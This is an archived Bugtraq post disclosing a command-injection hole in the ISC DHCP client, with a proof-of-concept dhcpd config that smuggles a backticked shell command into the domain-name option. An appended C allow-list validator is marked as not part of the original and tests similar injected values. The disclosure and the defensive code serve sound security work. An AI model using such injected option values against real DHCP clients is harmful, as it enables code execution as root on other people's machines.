Bugtraq mailing list archives

Re: possible root exploit in ISC DHCP client.


From: todd () FRIES NET (Todd T. Fries)
Date: Sun, 25 Jun 2000 02:20:45 -0700


Somebody at OpenBSD discovered a possible root exploit in the ISC DHCP
client.

Yes, I can confirm that as of 6:23am on June 23rd after several hours of
hacking around the sources I had the following dhcpd config running on my
own machine's private network for testing:

    shared-network LOCAL-NET {
        option  domain-name "my.`echo hi > /tmp/oops`.domain";
        option  domain-name-servers 192.168.1.3, 192.168.1.5;

        subnet 192.168.1.0 netmask 255.255.255.0 {
                option routers 192.168.1.1;

                range 192.168.1.32 192.168.1.127;
        }
    }

... and when dhclient finished running I had a nice little present
in /tmp/ named 'oops' that contained the string 'hi' ..

You did not miss my post to BugTraq because this is my first post.  After
conferring with my colleagues, we decided the first priority was to get
a fix .. then to notify people.  I am sorry you had to hear about this
4th hand, we really wanted people to know about it and the fix at the
same time.

As it turned out, between scheduled talks, other distractions, and the
net heading downstream early in the afternoon .. we were not able to
complete a fix and notify people before posting to bugtraq while
in San Diego.

While developed independently, we believe your fix will also work.

We have now had time to complete the patch, which is in the cvs tree,
and we have made source patches available for releases of OpenBSD 2.5 - 2.7.

Please visit http://www.openbsd.org/errata.hml#dhclient for links to
the patches for OpenBSD.
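
Added example, not part of the original post and not the OpenBSD or ISC patch: an allow-list check that a DHCP client could apply to a server-supplied domain-name value, such as the one in the test config above, before the value reaches anything a shell interprets. The function names `dhcp_domain_ok` and `dhcp_domain_ok_str` and the exact character set and length limits are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not from dhclient). Returns 1 if the option value
 * `s` of `len` bytes, as received on the wire and not assumed to be
 * NUL-terminated, looks like a plain DNS name; returns 0 otherwise.
 * Allow-list: letters, digits, '-' inside a label, '.' between labels. */
int dhcp_domain_ok(const unsigned char *s, size_t len)
{
    size_t i, label = 0;              /* label = length of current label */

    if (len == 0 || len > 253)        /* empty or longer than a DNS name */
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = s[i];
        if (c == '.') {
            if (label == 0 || s[i - 1] == '-')
                return 0;             /* empty label, or label ends in '-' */
            label = 0;
            continue;
        }
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '-'))
            return 0;                 /* backtick, $, ;, |, space, NUL, ... */
        if (c == '-' && label == 0)
            return 0;                 /* label may not start with '-' */
        if (++label > 63)
            return 0;                 /* DNS label length limit */
    }
    return s[len - 1] != '-';         /* a trailing '.' is accepted */
}

/* Convenience wrapper for NUL-terminated test strings. */
int dhcp_domain_ok_str(const char *s)
{
    return dhcp_domain_ok((const unsigned char *)s, strlen(s));
}

int main(void)
{
    /* Constructed inputs; the first is the value from the config above. */
    const char *samples[] = { "my.`echo hi > /tmp/oops`.domain",
                              "my.example.domain", "$(id).example" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-34s %s\n", samples[i],
               dhcp_domain_ok_str(samples[i]) ? "accept" : "reject");
    return 0;
}
```

A client that rejects or drops a value failing this check never passes the backtick sequence on; the length-based interface also catches an embedded NUL byte that a `strlen`-based check would miss.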

